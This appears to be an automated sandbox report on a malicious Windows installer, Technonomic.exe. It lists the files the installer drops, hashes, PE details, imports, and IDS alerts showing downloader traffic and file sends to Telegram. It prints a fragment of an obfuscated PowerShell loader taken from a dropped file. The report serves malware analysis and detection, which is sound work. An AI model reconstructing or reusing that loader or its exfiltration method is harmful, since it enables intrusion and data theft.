Joe Sandbox View:	Filename: Azygoses125.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: WYnv59N83j.exe, Detection: malicious, Browse Filename: t6V3uvyaAP.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Unspuriousness.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware2.20337.14221.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L...[..V...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nst22FC.tmp

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	10761386
Entropy (8bit):	0.6132307073228342
Encrypted:	false
SSDEEP:	24576:k77CgAkDXAMJvi2+FOmjH23Z+bh7A+LOj3XL:k77CgAkDXAMJvi2+FOeH8chEeOjnL
MD5:	68BF2A02BC67F4799AC7D72544F6F5A0
SHA1:	01C83C284D7077657AF6192E4E02607AA0AA52D6
SHA-256:	7F34186FB78A0D9705709B6BBF4033E1D23E52FA8307F1E2287D618DA2DB45F2
SHA-512:	34DD2272745D85B8BB3623E0407719D358AB995663826ADD7A2618A782C7C790239ADC22BC603143335F9D4857A48725783893A1305667EEC1DB0773051A4551
Malicious:	false
Preview:	./......,...................q... ...............~/..........................................................................................................................................................................................................................................G...R...........=...j...............................................................................................................................#...........6...,....(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	data
Category:	dropped
Size (bytes):	2387610
Entropy (8bit):	0.15942566220329682
Encrypted:	false
SSDEEP:	768:wzAcmELvlCt64oADSmhDEZNe508HYwhsi6zgTmx5upMjAthZFH/Jd3gmXTQu5Y+U:
MD5:	87E50D263F04628637C01FDD66A8F091
SHA1:	C6B097FD62805352C893727A5EDA4BEEDE2E413C
SHA-256:	F59F52215B994807B8ECBB7804CA1C8B4214A8BAAA2DD465E49080B695410842
SHA-512:	3E0BF1BDFEBFF9C29E0C82B0E37EBEC4FE6D94954391658F6CD95E485B76AA7E6FAE87CB70E809684B060A5C966855EE9EB4E8EEB6F178A23BA1E5B69F7954F7
Malicious:	false
Preview:	.....................................................................................................................................................&................................................................................................................................................................................................................................................#.....................................................................................................................................A..........................................................1.............................................................................'.................................................................u..................................................................................................................................................................................................................................................%.............................

C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4383), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	70033
Entropy (8bit):	5.190030481065896
Encrypted:	false
SSDEEP:	1536:tuDLO/GtnuIxGnnWmgcrNKXdFzn3H9zWnvP+arhDeBTFBEndqHnRHw+dI5:tSLO/LiGnvBro7WvPDrZeB5HRs5
MD5:	976EB0849970C5CB55573F0E7353C3EA
SHA1:	4DE6AC2DBC2C6426577A0D0A00E5CDC67A063F83
SHA-256:	E9BEE48A708248F9CA1407265D0F8FF57D6FB50B77875A4A540CB653762F882B
SHA-512:	1FAE421A9F2F06F0B96B5F6E6127E656406ED31A89E93FD0D21D130E46F1317B6771336E3D46F2596C3010A98134A6B842D807333FE31E41DE25FFAD47BFD593
Malicious:	true
Preview:	$Tackles=$Jomfruhaars;........$Tomatpureer = @'.Dressma.Morakke$ MonstrLCricklesT eelikeProni.yrH lpenssOrinidokHort.nsaEkskursrInaurateEncha.erAnonymisForstan=S lphin$InhabitD ExecuteSyslersbForlngeaUn,ercltLabouremRewrotedPelf iceakantusr Snreli;Arbejds.ForfatnfBi ritsuB.nvarmnKonsekvcA.lssentSystemfioriencyoClinkern Gullyg StenogrDElek,rorDamasceeOaflsnicTru petk Gamlins Ablast Afprv.i( Aseism$AppendiSRacyurocT,ninger.tommisaPithingnJordbaekD ssejlyLnramme,Funktio$plantigL P,pliniumyndigtSolopgazunsensliSkample)Gen.ral Outspok{Ridgeb...odregn.Va ieta$SektormFDec,nceiForegglp VeracisGe.brugkDigtning CothurgBlad one MedkmpnShockereChromat Natu al( CollatROrdetbeiSupershgB mestraNeatsoruS amefadComposioPimentanSmre opsLnsum e Escoche'MedkmpeT Pawpawa Billedr Armstrdplett tiSldefareDiktatu,Pe plek$Vlvens,TdogfennoAmbit.opByzo,erlErstatnePlato,idUdestaaeMalonylS aniljeBFrowstirRiveresuAfmarchiFlsomhes drivseGaardmn.havredyc Danaid flneri EXemeatat ProtogfTellsomapyrog ugCochylis tet as

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	777472
Entropy (8bit):	7.9548733986615385
Encrypted:	false
SSDEEP:	12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
MD5:	C174A412BE6F74C3323AE8D6D4737086
SHA1:	C703DAA5DF8C281206A8D85B582B8A1B729748F5
SHA-256:	BB71B94948E6929047BDE8DF94C187FBB6F2CC0119A0C386F84B9EA144AABD67
SHA-512:	9F2B95174FD1283964EA61E6DBE07C450ED0A01AAD6B3852C43EF6811A92878F0F123DFBC1F88B2CF05479A94AF098591BD579F3C3581521819F3B12D20DFA42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P..s...P...V...P..Rich.P..........................PE..L...y..V.................b..........3............@.................................X....@.............................................................8............................................................................................text...^a.......b.................. ..`.rdata..p............f..............@..@.data...X............z..............@....ndata...@...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\forsmgt.txt

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	398
Entropy (8bit):	4.246758482060977
Encrypted:	false
SSDEEP:	6:oqMiL/AZwy9A2YYut9HLv4CDGcL+iEnHE9DChVgwCtMWIX0FWWAz6CJArAkyVMIb:vMiL/RDttZPDpL0nHlVg1tXqMWjhb
MD5:	A01CF8B2F34D6F8D6A6067AD87AD420F
SHA1:	C49BFD81A1418697165CB62EDBEEF5E8D47157BA
SHA-256:	A85ACBE8F4FAD0CA373D1BC143633962C89D69E1503A3C310E283DA4EF97B4D7
SHA-512:	B4784A1754ABE449C17A5B88E2D4ECA4D0B9A80E5A20416B80CAAF8989FAB9A6BABCD711691D91246C9B1F12BA7C01FD00450AF247AB4E4B64174E79466636D9
Malicious:	false
Preview:	huskers kvierne workingman.maanedsmagasinerne patriotical torpederinger baromacrometer tubful synchronousness logeion syvendelenes cadere spasmolysis..djvlekultens conscripting nebulium snary streamerbaand balfaldaras nonbeatific unwitless diplomate..ressagernes indifferensen inositols saltningen flimsiness.fusioneringen papists taknemlighedglds transpirering,lkagernes frokostmders farthingdeal.

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\salpen.zoo

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	data
Category:	dropped
Size (bytes):	5161744
Entropy (8bit):	0.15808018941602964
Encrypted:	false
SSDEEP:	768:T+W5rfWR61urINGFhHyjTYYfH8tfhDPzQnR64u4EMMHPdu6izJlM/j2ZGoDuTmnj:moVSf
MD5:	862F3B806ED8EE61690B5CB807E4039F
SHA1:	63579479347755219148DB8926C9FAE8FF3456A4
SHA-256:	B8664ACCEAFF8EDC30B830CCEE20BF79BAC7D003169E8BD7A4C7FB025BBC83A7
SHA-512:	64B1617EB008A3496732D5737F2602F47796B6342DE64498BB93E1A3D94487FA1167DD008400FD19C46DF013FD6C211420AF4C33A9BAC3E15D13C5BE5984430B
Malicious:	false
Preview:	..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................e.....................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\magmaet\clenched\Retableredes.Ter

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	data
Category:	dropped
Size (bytes):	320608
Entropy (8bit):	7.662297766029789
Encrypted:	false
SSDEEP:	6144:i77CgAkDXAMJvi2+FEsMPNtnD6sa56B+29SknGxGzLY6HoOIMmrSt4Jfk8jFhnXn:i77CgAkDXAMJvi2+FOmjU+2932x6PGxU
MD5:	A9DC6D94FDB2C6592B4832C3F06CA195
SHA1:	89D856BD799A41348F5DBE6667A8223561CA1572
SHA-256:	523E1B41AA618625328EAB0ED0DE332EC4078DDED26EE1753180F4E45DB84C38
SHA-512:	F84D597A69E1D8130CBB97F2343983ABC1525F1F33B9021C90D7E6B9952D61FE697050B32B7EB4EC13BAB11DF3211DA4DA9E20B4F3B4E0D38227A61AFA0E5A01
Malicious:	false
Preview:	.................77.ggg...JJJ...+.<.......S.......r.RR............................&......"""........EEEEEE.........:.+.8...................................................w..................!!....]...O.........aaa.........................t........\|\|\|\|......UU......A...................h................9.....ZZ..........333333....J..........................P........g...........................................T.....c.H.......\......{........VVVV.....s..22............xx..}}.....P...........333.......^^^........wwwww.....H.-.D...+.. .G.................t.+.......................!.@@@@@@@...................d.WWW.}}.VVV..11........ ...................!...................q......).d.....SSS...........................oo..........999.::....=....B.........@...............................3...........LL......k......&..............w.#.....P.........................88....................1.^^..ss........................................(.z..\|.............k.\|...............E...............s.....U..[[[[...

C:\Users\user\AppData\Local\magmaet\clenched\aarsungens.bla

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	data
Category:	dropped
Size (bytes):	2802123
Entropy (8bit):	0.16014721035839247
Encrypted:	false
SSDEEP:	768:RaE9710bnra8qiClzbvAx57Ano7sKqOSTiTSqBoChrYB6j2QwGcklvNWuxDgQ4uv:C
MD5:	A7D919B312C1C74AB4C35A522D946B77
SHA1:	80DBDC65B19CFB6CBE8AECFA41D28F450857DCC5
SHA-256:	09C869BFBB2A5B7CC84D9E0F56C4F9FA728E1F23C2415DDC0E74FC3D39AA6154
SHA-512:	389824FE2C76C6C2204A56ACC7A160D133279B1C0C1F4A0635DA9351C4D82661D31DF2C536DC2A238F040A23AED46ADDD62657350EDFBA6820869B5B9C0473A5
Malicious:	false
Preview:	.............................................................w............................................................................................................................................................................................7..........................................................................................................................................................................^......................................................................................................................................................................................................r....................d..............................................................................................................................v.......................................................................................................................................................................................................................................

C:\Windows\Resources\unthick.ini

Download File

Process:	C:\Users\user\Desktop\Technonomic.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	33
Entropy (8bit):	4.187889194919351
Encrypted:	false
SSDEEP:	3:bovixgS7v4M2L:TgS7gZL
MD5:	E23F52386361095BDB7040B09E2216AE
SHA1:	91F31DD82AB80140DB621B6DCE0B9B5D6B568723
SHA-256:	36467321184A76E0FEA592D2896856A37EC18FC8480DE66F05D719D93B39D070
SHA-512:	19D18DE54B3466F0D283271786B3B308C3BE07F21174C46563C4C16292716C52F2C1B85F416ED77143EA6847BFC4C4C37F22296948EAC47499276B181F129B9C
Malicious:	false
Preview:	[gap]..predespond=fascinatingly..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9548733986615385
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Technonomic.exe
File size:	777'472 bytes
MD5:	c174a412be6f74c3323ae8d6d4737086
SHA1:	c703daa5df8c281206a8d85b582b8a1b729748f5
SHA256:	bb71b94948e6929047bde8df94c187fbb6f2cc0119a0c386f84b9ea144aabd67
SHA512:	9f2b95174fd1283964ea61e6dbe07c450ed0a01aad6b3852c43ef6811a92878f0f123dfbc1f88b2cf05479a94af098591bd579f3c3581521819f3b12d20dfa42
SSDEEP:	12288:iDGZKmormA1bzZN13qv776npUyBsIpxBFmgI2uSb+zKikGOfj8UvbjSM+LLWwvpf:gmor/1/Z877oS8sEx/PI//zKNzpbNQLt
TLSH:	70F4232B3349C513C473A271E816AFF1C6E81DA2D565C68F67207E2938BB3C359593B2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P.._...P...P..NP.._...P...s...P...V...P..Rich.P..........................PE..L...y..V.................b...*.....

File Icon


Icon Hash:	070b4d61782c178f

Static PE Info

General

Entrypoint:	0x4033b6
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x567F8479 [Sun Dec 27 06:26:01 2015 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7192d3773f389d45ebac3cc67d054a8a

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Skovsneglen, E=Nonimplication99@Hjovnen.Ke, O=Skovsneglen, L=Heuchelheim, OU="Salpingostomatomy Wickies ", S=Hessen, C=DE
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	13/07/2024 05:35:45 13/07/2025 05:35:45
Subject Chain	CN=Skovsneglen, E=Nonimplication99@Hjovnen.Ke, O=Skovsneglen, L=Heuchelheim, OU="Salpingostomatomy Wickies ", S=Hessen, C=DE
Version:	3
Thumbprint MD5:	AC528614DA7ED49EBCB7556EFC280D19
Thumbprint SHA-1:	64C8E8BE1AB377C991BA18B0D7D159956383E7C9
Thumbprint SHA-256:	C904F9A60F606786BB3246FAB58A97197A72EF9A58CB3D90156677800C6DFE55
Serial:	5E8F74E19A3AB88E76AA9AED28EE1AC63D35F58F

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebp
push esi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+0Ch], ebp
push 00008001h
mov dword ptr [esp+0Ch], 0040A230h
mov dword ptr [esp+18h], ebp
call dword ptr [004080B4h]
call dword ptr [004080B0h]
cmp ax, 00000006h
je 00007FF2B9353AC3h
push ebp
call 00007FF2B9356C1Eh
cmp eax, ebp
je 00007FF2B9353AB9h
push 00000C00h
call eax
push ebx
push edi
push 0040A3B0h
call 00007FF2B9356B9Bh
push 0040A3A8h
call 00007FF2B9356B91h
push 0040A39Ch
call 00007FF2B9356B87h
push 00000009h
call 00007FF2B9356BECh
push 00000007h
call 00007FF2B9356BE5h
mov dword ptr [0042A264h], eax
call dword ptr [00408044h]
push ebp
call dword ptr [004082A8h]
mov dword ptr [0042A318h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00421708h
call dword ptr [0040818Ch]
push 0040A384h
push 00429260h
call 00007FF2B93567D2h
call dword ptr [004080ACh]
mov ebx, 00435000h
push eax
push ebx
call 00007FF2B93567C0h
push ebp
call dword ptr [00408178h]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84bc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0x1c5c8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbd5c8	0x738
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x615e	0x6200	41c79e199a2175acbe73d4712982d296	False	0.6625876913265306	data	6.4557374109402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1370	0x1400	9cbedf8ff452ddf88e3b9cf6f80372a9	False	0.4404296875	data	5.102148788391081	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	73e3da5d6c2dd1bec8a02d238a90e209	False	0.5149739583333334	data	4.09485328769633	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x24000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0x1c5c8	0x1c600	0e60bf3ace34d6a7de54772dad04b786	False	0.8734684746696035	data	7.577852317524115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f418	0xc9c0	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9973280669144982
RT_ICON	0x5bdd8	0x5d9c	PNG image data, 256 x 256, 8-bit colormap, non-interlaced	English	United States	0.9926556501418795
RT_ICON	0x61b78	0x2e8e	PNG image data, 256 x 256, 4-bit colormap, non-interlaced	English	United States	0.9979023326061419
RT_ICON	0x64a08	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4182572614107884
RT_ICON	0x66fb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.45075046904315197
RT_ICON	0x68058	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304	English	United States	0.6625799573560768
RT_ICON	0x68f00	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024	English	United States	0.7382671480144405
RT_ICON	0x697a8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.6317073170731707
RT_ICON	0x69e10	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256	English	United States	0.5505780346820809
RT_ICON	0x6a378	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6187943262411347
RT_ICON	0x6a7e0	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.7002688172043011
RT_ICON	0x6aac8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.8074324324324325
RT_DIALOG	0x6abf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x6acf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x6ae10	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x6aed8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x6af38	0xae	data	English	United States	0.6379310344827587
RT_VERSION	0x6afe8	0x29c	data	English	United States	0.5089820359281437
RT_MANIFEST	0x6b288	0x33f	XML 1.0 document, ASCII text, with very long lines (831), with no line terminators	English	United States	0.5547533092659447

Imports

DLL	Import
KERNEL32.dll	SetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, CreateFileW, GetFileSize, MoveFileW, SetFileAttributesW, GetModuleFileNameW, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, GetCurrentProcess, CompareFileTime, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, LoadLibraryW, GetProcAddress, GetModuleHandleA, ExpandEnvironmentStringsW, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, GlobalFree, lstrcmpW, GlobalAlloc, WaitForSingleObject, GetDiskFreeSpaceW, lstrcpynW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, GetDC, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, LoadImageW, SetWindowLongW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, SetTimer, FindWindowExW, SendMessageTimeoutW, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T11:28:19.193344+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49859	172.217.19.238	443	TCP
2024-12-24T11:28:27.076023+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49881	193.122.6.168	80	TCP
2024-12-24T11:28:29.591650+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49881	193.122.6.168	80	TCP
2024-12-24T11:28:31.203039+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49893	172.67.177.134	443	TCP
2024-12-24T11:28:32.638538+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49898	193.122.6.168	80	TCP
2024-12-24T11:28:35.701053+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.9	49907	193.122.6.168	80	TCP
2024-12-24T11:28:43.419540+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49930	172.67.177.134	443	TCP
2024-12-24T11:28:46.508208+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49938	172.67.177.134	443	TCP
2024-12-24T11:28:49.552413+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.9	49947	172.67.177.134	443	TCP
2024-12-24T11:28:54.646489+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.9	49962	149.154.167.220	443	TCP
2024-12-24T11:29:01.923440+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49980	149.154.167.220	443	TCP
2024-12-24T11:29:05.422716+0100	1810008	Joe Security ANOMALY Telegram Send File	1	192.168.2.9	49990	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 11:28:16.591463089 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:16.591522932 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:16.591747046 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:16.602967024 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:16.602998972 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:18.299297094 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:18.299376011 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:18.300062895 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:18.300126076 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:18.353813887 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:18.353851080 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:18.354142904 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:18.354214907 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:18.356811047 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:18.403331041 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:19.193259001 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:19.193417072 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:19.193443060 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:19.193480015 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:19.193604946 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:19.193643093 CET	443	49859	172.217.19.238	192.168.2.9
Dec 24, 2024 11:28:19.193706989 CET	49859	443	192.168.2.9	172.217.19.238
Dec 24, 2024 11:28:19.365014076 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:19.365056992 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:19.365145922 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:19.365379095 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:19.365391016 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:21.065679073 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:21.065747023 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:21.069694042 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:21.069701910 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:21.069942951 CET	443	49866	142.250.181.1	192.168.2.9
Dec 24, 2024 11:28:21.069998026 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:21.070324898 CET	49866	443	192.168.2.9	142.250.181.1
Dec 24, 2024 11:28:21.115324974 CET	443	49866	142.250.181.1	192.168.2.9
